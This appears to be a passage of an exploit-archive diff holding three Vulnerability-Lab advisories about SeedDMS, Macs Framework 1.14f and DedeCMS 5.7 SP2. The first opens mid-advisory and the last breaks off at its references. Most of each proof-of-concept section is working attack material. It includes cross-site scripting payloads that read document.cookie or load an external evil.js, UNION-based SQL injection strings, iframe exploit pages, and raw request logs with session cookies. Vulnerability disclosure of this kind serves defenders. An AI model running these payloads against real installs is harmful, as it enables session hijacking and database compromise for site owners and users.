The vulnerability allows remote attackers to inject own malicious script
codes with persistent attack vector to compromise browser to
web-application requests from the application-side.
The persistent cross site scripting web vulnerabilities are located in
the `name` and `comment` parameter of the `AddEvent.php` file.
Remote attackers are able to add an own event via op.AddEvent with
malicious script codes. The request method to inject is POST
and the attack vector is located on the application-side. After the
inject the execution occurs in the admin panel within the
`Log Management` - `Webdav` and `Web` on view. The content of the
comment and name is unescaped pushed inside of the logs with
a html/js template. Thus allows an attacker to remotly exploit the issue
by a simple post inject from outside with lower privileges.
Successful exploitation of the vulnerability results in session
hijacking, persistent phishing attacks, persistent external redirects
to malicious source and persistent manipulation of affected or connected
application modules.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] op.AddEvent (AddEvent.php)
Vulnerable Parameter(s):
[+] name
[+] comment
Affected Module(s):
[+] Log Management (out.LogManagement.php)
Proof of Concept (PoC):
=======================
The persistent web vulnerability can be exploited by remote attackers
with low privileged web-application user account and low user interaction.
For security demonstration or to reproduce the security web
vulnerability follow the provided information and steps below to continue.
Manual steps to reproduce the vulnerability ...
1. Start your local webbrowser and tamper the http protocol session
2. Open the AddEvent.php and add a new event
3. Insert your script code test payload inside the Name or Comments path
4. Save or submit the entry with error
Note: Now the web and webdav log has captured the insert or erro
5. Now wait until the administrator previews in the log management the
web or webdav view function
6. Successful reproduce of the persistent web vulnerability!
PoC: Vulnerable Source (Log Management - View)
<pre>Apr 13 19:23:22 [info] admin (localhost) op.RemoveLog
?logname=20200413.log
Apr 13 19:29:53 [info] admin (localhost) op.AddEvent ?name="<iframe
src="evil.source" onload="alert(document.cookie)"></iframe>
&comment=<iframe src="evil.source"
onload="alert(document.cookie)"></iframe>&from=1586728800&to=1586815199
</pre>
PoC: Payload
>"<iframe%20src=evil.source%20onload=alert(document.cookie)></iframe>
--- PoC Session Logs (POST) ---
https://SeedDMS.localhost:8080/out/out.AddEvent.php
Host: SeedDMS.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://SeedDMS.localhost:8080/out/out.Calendar.php?mode=y
Cookie: mydms_session=b0496ccee96aa571a3ca486b8738c312
-
GET: HTTP/1.1 200 OK
Server: Apache/2.4.25 (Debian)
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 2973
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
-
https://SeedDMS.localhost:8080/op/op.AddEvent.php
Host: SeedDMS.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 356
Origin: https://SeedDMS.localhost:8080
Connection: keep-alive
Referer: https://SeedDMS.localhost:8080/out/out.AddEvent.php
Cookie: mydms_session=b0496ccee96aa571a3ca486b8738c312
from=2020-04-13&to=2020-04-13
&name=>"<iframe src=evil.source
onload=alert(document.cookie)></iframe>&comment=>"<iframe
src=evil.source onload=alert(document.cookie)></iframe>
-
POST: HTTP/1.1 302 Found
Server: Apache/2.4.25 (Debian)
Location: ../out/out.Calendar.php?mode=w&day=13&year=2020&month=04
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Note: Injection Point via Calender op.AddEvent Name & Comment
--- PoC Session Logs (GET) ---
https://SeedDMS.localhost:8080/out/out.LogManagement.php?logname=20200413.log
Host: SeedDMS.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept: text/html, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Connection: keep-alive
Referer: https://SeedDMS.localhost:8080/out/out.LogManagement.php
Cookie: mydms_session=b0496ccee96aa571a3ca486b8738c312
-
GET: HTTP/1.1 200 OK
Server: Apache/2.4.25 (Debian)
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 273
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
https://SeedDMS.localhost:8080/out/evil.source
Host: SeedDMS.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://SeedDMS.localhost:8080/out/out.LogManagement.php
Cookie: mydms_session=b0496ccee96aa571a3ca486b8738c312
Upgrade-Insecure-Requests: 1
-
GET: HTTP/1.1 302 Found
Server: Apache/2.4.25 (Debian)
Location: /out/out.ViewFolder.php
Content-Length: 0
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Note: Execution Point via Log Management (AP) on Webdav View or Web View
Reference(s):
https://SeedDMS.localhost:8080/
https://SeedDMS.localhost:8080/op/op.AddEvent.php
https://SeedDMS.localhost:8080/out/out.ViewFolder.php
https://SeedDMS.localhost:8080/out/out.AddEvent.php
https://SeedDMS.localhost:8080/out/out.LogManagement.php
https://SeedDMS.localhost:8080/out/out.Calendar.php?mode=
https://SeedDMS.localhost:8080/out/out.LogManagement.php?logname=
Solution - Fix & Patch:
=======================
1. Parse and escape the name and comment input field on transmit to sanitize
2. Filter and restrict the input field of the name and comments
parameter for special chars to prevent injects
3. Parse the output location of all web and webdav logfiles to prevent
the execution point
Security Risk:
==============
The security risk of the persistent cross site web vulnerabilities in
the seeddms web-application are estimated as medium.
Credits & Authors:
==================
Vulnerability-Lab -
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri -
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability
and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been
advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or
incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies,
deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com www.vuln-lab.com
www.vulnerability-db.com
Services: magazine.vulnerability-lab.com
paste.vulnerability-db.com infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php
vulnerability-lab.com/rss/rss_upcoming.php
vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php
vulnerability-lab.com/register.php
vulnerability-lab.com/list-of-bug-bounty-programs.php
Any modified copy or reproduction, including partially usages, of this
file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified
form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers.
All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the
specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.
Copyright © 2020 | Vulnerability Laboratory - [Evolution
Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM

482
exploits/php/webapps/48325.txt Normal file
View file

@ -0,0 +1,482 @@
# Title: Macs Framework 1.14f CMS - Persistent Cross-Site Scripting
# Author: Vulnerability Laboratory
# Date: 2020-04-15
# Software Link: https://sourceforge.net/projects/macs-framework/files/latest/download
# CVE: N/A
Document Title:
===============
Macs Framework v1.14f CMS - Multiple Web Vulnerabilities
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2206
Release Date:
=============
2020-04-14
Vulnerability Laboratory ID (VL-ID):
====================================
2206
Common Vulnerability Scoring System:
====================================
7.4
Vulnerability Class:
====================
Multiple
Current Estimated Price:
========================
1.000€ - 2.000€
Product & Service Introduction:
===============================
Macs CMS is a Flat File (XML and SQLite) based AJAX Content Management
System. It focuses mainly on the
Edit In Place editing concept. It comes with a built in blog with
moderation support, user manager section,
roles manager section, SEO / SEF URL.
https://sourceforge.net/projects/macs-framework/files/latest/download
(Copy of the Homepage: https://sourceforge.net/projects/macs-framework/ )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple web
vulnerabilities in the official Macs Framework v1.1.4f CMS.
Affected Product(s):
====================
Macrob7
Product: Macs Framework v1.14f - Content Management System
Vulnerability Disclosure Timeline:
==================================
2020-04-14: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Authentication Type:
====================
Restricted authentication (user/moderator) - User privileges
User Interaction:
=================
Low User Interaction
Disclosure Type:
================
Independent Security Research
Technical Details & Description:
================================
1.1 & 1.2
Multiple non-persistent cross site scripting web vulnerabilities has
been discovered in the official Mac Framework v1.1.4f Content Managament
System.
The vulnerability allows remote attackers to manipulate client-side
browser to web-applicatio requests to compromise user sesson credentials
or to
manipulate module content.
The first vulnerability is located in the search input field of the
search module. Remote attackers are able to inject own malicious script
code as
search entry to execute the code within the results page that is loaded
shortly after the request is performed. The request method to inject is
POST
and the attack vector is located on the client-side with non-persistent
attack vector.
The second vulnerability is located in the email input field of the
account reset function. Remote attackers are able to inject own
malicious script code as
email to reset the passwort to execute the code within performed
request. The request method to inject is POST and the attack vector is
located on the
client-side with non-persistent attack vector.
Successful exploitation of the vulnerabilities results in session
hijacking, non-persistent phishing attacks, non-persistent external
redirects to
malicious source and non-persistent manipulation of affected or
connected application modules.
Request Method(s):
[+] POST
Vulnerable Parameter(s):
[+] searchString
[+] emailAdress
1.3
Multiple remote sql-injection web vulnerabilities has been discovered in
the official Mac Framework v1.1.4f Content Managament System.
The vulnerability allows remote attackers to inject or execute own sql
commands to compromise the dbms or file system of the application.
The sql injection vulnerabilities are located in the `roleId` and
`userId` of the `editRole` and `deletUser` module. The request method to
inject or execute commands is GET and the attack vector is located on
the application-side. Attackers with privileged accounts to edit are
able to inject own sql queries via roleid and userid on deleteUser or
editRole. Multiple unhandled and broken sql queries are visible as default
debug to output for users as well.
Exploitation of the remote sql injection vulnerability requires no user
interaction and a privileged web-application user account.
Successful exploitation of the remote sql injection results in database
management system, web-server and web-application compromise.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] deleteUser
[+] editRole
Vulnerable Parameter(s):
[+] userId
[+] roleId
Proof of Concept (PoC):
=======================
Google Dork(s): intitle, subtitle & co.
Site Powered by Mac's PHP MVC Framework Framework of the future
Design downloaded from Zeroweb.org: Free website templates, layouts, and
tools.
1.1
The non-persistent cross site scripting web vulnerability can be
exploited by remote attackers without user account and with low user
interaction.
For security demonstration or to reproduce the cross site scripting web
vulnerability follow the provided information and steps below to continue.
PoC: Payload
>">"<iframe src=evil.source
onload=alert(document.cookie)>&scrollPosition=0&scrollPosition=0
PoC: Vulnerable Source
<form method="post"
action="https://macs-cms.localhost:8080/index.php/search" id="searchForm">
<span class="searchLabel">Search Site:</span><input type="searchString"
value="" name="searchString" class="searchString">
<input type="submit" value="Search" class="searchSubmit">
</form><br>
<span class="error">No Results found for: "<iframe src="evil.source"
onload="alert(document.cookie)"></span>
--- PoC Session Logs [POST] ---
https://macs-cms.localhost:8080/index.php/search
Host: macs-cms.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 112
Origin: https://macs-cms.localhost:8080
Authorization: Basic dGVzdGVyMjM6Y2hhb3M2NjYhISE=
Connection: keep-alive
Referer: https://macs-cms.localhost:8080/index.php
Cookie: PHPSESSID=h81eeq4jucus8p9qp146pjn652;
Upgrade-Insecure-Requests: 1
searchString=>">"<iframe src=evil.source
onload=alert(document.cookie)>&scrollPosition=0&scrollPosition=0
-
POST: HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
X-Powered-By-Plesk: PleskWin
Content-Length: 9865
1.2
The non-persistent cross site scripting web vulnerability can be
exploited by remote attackers without user account and with low user
interaction.
For security demonstration or to reproduce the cross site scripting web
vulnerability follow the provided information and steps below to continue.
PoC: Exploitation
test"<iframe src=evil.source onload=alert(document.cookie)>@gmail.com
PoC: Vulnerable Source
<form method="post"
action="https://macs-cms.localhost:8080/index.php/main/cms/login"
class="ajax" ajaxoutput="#loginMessage">
<table style="width:100%">
<tbody><tr>
<td style="width: 20px">Username:</td>
<td><input type="text" name="username"></td>
</tr>
<tr>
<td>Password:</td>
<td><input type="password" name="password"></td>
</tr>
<tr>
<td colspan="2"><input type="submit" value="Login"></td>
</tr>
<tr>
<td colspan="2"><br><div id="loginMessage" style="display:
block;">Invalid Username or Password</div></td>
</tr>
</tbody></table>
<br>
<a
href="https://macs-cms.localhost:8080/index.php/main/cms/forgotPassword"
class="ajax" ajaxoutput="#forgotPassword">Forgot Password</a>
<input type="hidden" name="scrollPosition" value="102"></form>
<div id="forgotPassword" style="display: block;">
<form class="ajax" method="post"
action="https://macs-cms.localhost:8080/index.php/main/cms/forgotPasswordProcess"
ajaxoutput="#forgotPasswordReturn">
Enter your email address: <input type="text" name="emailAddress"><br>
<input type="submit" value="Send Email">
</form>
<br>
<div id="forgotPasswordReturn" style="display: block;">Cannot find user
with Email address:
test"<iframe src=evil.source
onload=alert(document.cookie)>@gmail.com</iframe></div>
</div>
--- PoC Session Logs [POST] ---
https://macs-cms.localhost:8080/index.php/main/cms/forgotPassword
Host: macs-cms.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 17
Origin: https://macs-cms.localhost:8080
Connection: keep-alive
Referer: https://macs-cms.localhost:8080/index.php/main/cms/login
Cookie: PHPSESSID=h81eeq4jucus8p9qp146pjn652;
ajaxRequest=true
-
POST: HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
X-Powered-By-Plesk: PleskWin
Content-Length: 335
-
https://macs-cms.localhost:8080/index.php/main/cms/forgotPasswordProcess
Host: macs-cms.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 123
Origin: https://macs-cms.localhost:8080
Connection: keep-alive
Referer: https://macs-cms.localhost:8080/index.php/main/cms/login
Cookie: PHPSESSID=h81eeq4jucus8p9qp146pjn652;
ajaxRequest=true&=&emailAddress=test"<iframe src=evil.source
onload=alert(document.cookie)>@gmail.com
-
POST: HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
X-Powered-By-Plesk: PleskWin
Content-Length: 105
1.3
The remote sql injection web vulnerability can be exploited by remote
attackers with privileged application user account and without user
interaction.
For security demonstration or to reproduce the cross site scripting web
vulnerability follow the provided information and steps below to continue.
PoC: Payload
%27-1%20order%20by%205--
%27-1%20union select 1,2,3,4,@@version--
PoC: Exploitation
<html>
<head><body><title>Mac's CMS SQL Injection PoC</title>
<iframe
src=https://macs-cms.localhost:8080/index.php/main/cms/editRole?roleId=%27-1%20order%20by%205--%20>
<iframe
src=https://macs-cms.localhost:8080/index.php/main/cms/editRole?roleId=%27-1%20union
select 1,2,3,4,@@version--%20>
<iframe
src=https://macs-cms.localhost:8080/index.php/main/cms/deleteUser?userId=%27-1%20order%20by%205--%20>
<iframe
src=https://macs-cms.localhost:8080/index.php/main/cms/deleteUser?userId=%27-1%20union
select 1,2,3,4,@@version--%20>
</body></head>
</html>
--- PoC Session Logs [GET] ---
https://macs-cms.localhost:8080/index.php/main/cms/editRole?roleId='-1
order by 5--
Host: macs-cms.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: __utma=72517782.1164807459.1586620290.1586620290.1586620290.1;
Upgrade-Insecure-Requests: 1
-
GET: HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
X-Powered-By-Plesk: PleskWin
Content-Length: 53
--- [SQL Error Exception Logs] ---
SQLSTATE[HY000]: General error: 1 near "1": syntax error
-
Error executing SQL statement
SQLSTATE[HY000]: General error: 1 unrecognized token: "''';"
-
Error executing SQL statement
SQLSTATE[HY000]: General error: 1 1st ORDER BY term out of range -
should be between 1 and 5
-
5.0.12 'pwnd
This page was created in 1.5665068626404 seconds
Security Risk:
==============
1.1 & 1.2
the security risk of the client-side cross site scripting web
vulnerabilities in the search and email reset function are estimated as
medium.
1.3
The security risk of the remote sql injection web vulnerabilities in the
id parameters on delete are estimated as high.
Credits & Authors:
==================
Vulnerability-Lab -
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri -
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability
and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been
advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or
incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies,
deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com www.vuln-lab.com
www.vulnerability-db.com
Services: magazine.vulnerability-lab.com
paste.vulnerability-db.com infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php
vulnerability-lab.com/rss/rss_upcoming.php
vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php
vulnerability-lab.com/register.php
vulnerability-lab.com/list-of-bug-bounty-programs.php
Any modified copy or reproduction, including partially usages, of this
file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified
form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers.
All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the
specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.
Copyright © 2020 | Vulnerability Laboratory - [Evolution
Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM

363
exploits/php/webapps/48326.txt Normal file
View file

@ -0,0 +1,363 @@
# Title: DedeCMS 7.5 SP2 - Persistent Cross-Site Scripting
# Author: Vulnerability Laboratory
# Date: 2020-04-15
# Vendor Link: http://www.dedecms.com
# Software Link: http://www.dedecms.com/products/dedecms/downloads/
# CVE: N/A
Document Title:
===============
DedeCMS v7.5 SP2 - Multiple Persistent Web Vulnerabilities
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2195
Release Date:
=============
2020-04-09
Vulnerability Laboratory ID (VL-ID):
====================================
2195
Common Vulnerability Scoring System:
====================================
4.3
Vulnerability Class:
====================
Cross Site Scripting - Persistent
Current Estimated Price:
========================
500€ - 1.000€
Product & Service Introduction:
===============================
Welcome to use the most professional PHP website content management
system in China-Zhimeng content management system,
he will be your first choice for easy website building. Adopt XML name
space style core templates: all templates are
saved in file form, which provides great convenience for users to design
templates and website upgrade transfers.
The robust template tags provide strong support for webmasters to DIY
their own websites. High-efficiency tag caching
mechanism: Allows the caching of similar tags. When generating HTML, it
helps to improve the reaction speed of the
system and reduce the resources consumed by the system.
(Copy of the homepage: http://www.dedecms.com/products/dedecms/downloads/)
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple
persistent cross site vulnerabilities in
the official DedeCMS v5.7 SP2 (UTF8) web-application.
Affected Product(s):
====================
DesDev Inc.
Product: DedeCMS - Content Management System v5.7 SP2
Vulnerability Disclosure Timeline:
==================================
2020-04-09: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Authentication Type:
====================
Restricted authentication (user/moderator) - User privileges
User Interaction:
=================
Low User Interaction
Disclosure Type:
================
Independent Security Research
Technical Details & Description:
================================
Multiple persistent cross site scripting vulnerabilities has been
discovered in the official DedeCMS v5.7 SP2 UTF8 web-application.
The vulnerability allows remote attackers to inject own malicious script
codes with persistent attack vector to compromise browser to
web-application requests from the application-side.
The persistent script code inject web vulnerabilities are located in the
`activepath`, `keyword`, `tag`, `fmdo=x&filename`, `CKEditor`
and `CKEditorFuncNum`parameters of the `file_pic_view.php`,
`file_manage_view.php`, `tags_main.php`, `select_media.php`,
`media_main.php` files.
The attack vector of the vulnerability is non-persistent and the request
method to inject is POST. Successful exploitation of the vulnerability
results in session hijacking, persistent phishing attacks, persistent
external redirects to malicious source and persistent manipulation
of affected or connected application modules.
Request Method(s):
[+] POST
Vulnerable File(s):
[+] file_pic_view.php
[+] file_manage_view.php
[+] tags_main.php
[+] select_media.php
[+] media_main.php
Vulnerable Parameter(s):
[+] tag
[+] keyword
[+] activepath
[+] fmdo=move&filename & fmdo=edit&filename
[+] CKEditor & CKEditor=body&CKEditorFuncNum
Proof of Concept (PoC):
=======================
The web vulnerabilities can be exploited by remote attackers with
privileged user account and with low user interaction.
For security demonstration or to reproduce the vulnerability follow the
provided information and steps below to continue.
Request: Examples
https://test23.localhost:8080/dede/file_manage_view.php?fmdo=move&filename=test&activepath=%2Fuploads
https://test23.localhost:8080/dede/tags_main.php?tag=&orderby=total&orderway=desc
https://test23.localhost:8080/include/dialog/select_media.php?CKEditor=body&CKEditorFuncNum=2&langCode=en
PoC: Payload
".>"<img>"%20<img src=[Evil.Domain]/[Evil.Source].*
onload=alert(document.domain)>
>"%20<"<img="" src="https:/www.vulnerability-lab.com/gfx/logo-header.png
onload=alert(document.domain)">
>"><iframe src=evil.source onload=alert(document.domain)>
%22%3E%3Ciframe%20src=%22https://vuln-lab.com/evil.js%22%3E
%3E%22%3E%3Ciframe%20src=%22x%22%20onload=alert(document.domain)%3E%3Cimg%3E
%3E%22%3Cimg%20src=%22[Evil.Source]%22%3E%3Cimg%20src=%22[Evil.Source]%22%3E
PoC: Exploitation
<title>DedeCMS v5.7 SP2 UTF8 - Multiple Non Persistent XSS PoCs</title>
<iframe
src="https://test23.localhost:8080/dede/file_pic_view.php?activepath=%2Fuploads%3E%22%3Cimg%20src=%22[Evil.Source]%22%3E%3Cimg%20src=%22[Evil.Source]%22%3E">
<iframe
src="https://test23.localhost:8080/dede/file_manage_view.php?fmdo=move&filename=%3E%22%3E%3Ciframe%20src=%22x%22%20onload=alert(document.domain)%3E%3Cimg%3E&activepath=%2Fuploads">
<iframe
src="https://test23.localhost:8080/dede/file_manage_view.php?fmdo=move&filename=test&activepath=%3E%22%3E%3Ciframe%20src=%22x%22%20onload=alert(document.domain)%3E%3Cimg%3E">
<iframe
src="https://test23.localhost:8080/dede/tags_main.php?tag=pwnd&orderway=%22%3E%3Ciframe%20src=%22https://vuln-lab.com/evil.js%22%3E">
<iframe
src="https://test23.localhost:8080/dede/tags_main.php?tag=%22%3E%3Ciframe%20src=%22https://vuln-lab.com/evil.js%22%3E&orderby=1&orderway=">
<iframe
src="https://test23.localhost:8080/include/dialog/select_media.php?CKEditor=>"><iframe
src=evil.source
onload=alert(document.domain)>body&CKEditorFuncNum=2&langCode=en">
<iframe
src="https://test23.localhost:8080/include/dialog/select_media.php?CKEditor=body&CKEditorFuncNum=>"><iframe
src=evil.source onload=alert(document.domain)>2&langCode=en">
...
--- PoC Session Logs [POST] --- (Some Examples ...)
https://test23.localhost:8080/dede/media_main.php
Host: test23.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0)
Gecko/20100101 Firefox/74.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 152
Origin: https://test23.localhost:8080
Authorization: Basic dGVzdGVyMjM6Y2hhb3M2NjYhISE=
Connection: keep-alive
Referer: https://test23.localhost:8080/dede/media_main.php
Cookie: menuitems=1_1%2C2_1%2C3_1; PHPSESSID=2et4s8ep51lasddnshjcco5ji3;
DedeUserID=1; DedeUserID__ckMd5=936f42b01c3c7958;
DedeLoginTime=1586191031; DedeLoginTime__ckMd5=37af65fa4635a14f;
ENV_GOBACK_URL=%2Fdede%2Fmedia_main.php
keyword=>"%20<<img
src=https://[Evil.Domain]/[Evil.Source].png>&mediatype=0&membertype=0&imageField.x=23&imageField.y=4
-
POST: HTTP/2.0 200 OK
server: nginx
content-type: text/html; charset=utf-8
content-length: 1830
expires: Thu, 19 Nov 1981 08:52:00 GMT
pragma: no-cache
cache-control: private
set-cookie: ENV_GOBACK_URL=%2Fdede%2Fmedia_main.php; expires=Mon,
06-Apr-2020 17:53:23 GMT; Max-Age=3600; path=/
vary: Accept-Encoding
content-encoding: gzip
x-powered-by: PHP/5.6.40, PleskLin
X-Firefox-Spdy: h2
---
https://test23.localhost:8080/dede/file_pic_view.php
?activepath=%2Fuploads%2F>"
<"<img+src%3Dhttps%3A%2F%2Fwww.vulnerability-lab.com%2Fgfx%2Flogo-header.png>&imageField.x=0&imageField.y=0
Host: test23.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0)
Gecko/20100101 Firefox/74.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Authorization: Basic dGVzdGVyMjM6Y2hhb3M2NjYhISE=
Connection: keep-alive
Referer:
https://test23.localhost:8080/dede/file_pic_view.php?activepath=&imageField.x=0&imageField.y=0
Cookie: menuitems=1_1%2C2_1%2C3_1; PHPSESSID=2et4s8ep51lasddnshjcco5ji3;
DedeUserID=1; DedeUserID__ckMd5=936f42b01c3c7958;
DedeLoginTime=1586191031; DedeLoginTime__ckMd5=37af65fa4635a14f;
ENV_GOBACK_URL=%2Fdede%2Fmedia_main.php%3Fdopost%3Dfilemanager
Upgrade-Insecure-Requests: 1
-
GET: HTTP/2.0 200 OK
server: nginx
content-type: text/html; charset=utf-8
x-powered-by: PHP/5.6.40
expires: Thu, 19 Nov 1981 08:52:00 GMT
pragma: no-cache
cache-control: private
X-Firefox-Spdy: h2
---
https://test23.localhost:8080/include/dialog/select_media.php?
CKEditor=>"><iframe src=evil.source
onload=alert("1")>body&CKEditorFuncNum=>"><iframe src=evil.source
onload=alert("2")>2&langCode=en
Host: test23.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0)
Gecko/20100101 Firefox/74.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Authorization: Basic dGVzdGVyMjM6Y2hhb3M2NjYhISE=
Connection: keep-alive
Cookie: PHPSESSID=2et4s8ep51lasddnshjcco5ji3; DedeUserID=1;
DedeUserID__ckMd5=936f42b01c3c7958;
DedeLoginTime=1586191031; DedeLoginTime__ckMd5=37af65fa4635a14f;
ENV_GOBACK_URL=%2Fdede%2Ffeedback_main.php
Upgrade-Insecure-Requests: 1
-
GET: HTTP/2.0 200 OK
server: nginx
content-type: text/html; charset=utf-8
content-length: 1137
expires: Thu, 19 Nov 1981 08:52:00 GMT
cache-control: no-store, no-cache, must-revalidate, post-check=0,
pre-check=0
pragma: no-cache
vary: Accept-Encoding
content-encoding: gzip
x-powered-by: PHP/5.6.40, PleskLin
X-Firefox-Spdy: h2
Reference(s):
https://test23.localhost:8080/dede/media_main.php
https://test23.localhost:8080/dede/tags_main.php
https://test23.localhost:8080/dede/file_pic_view.php
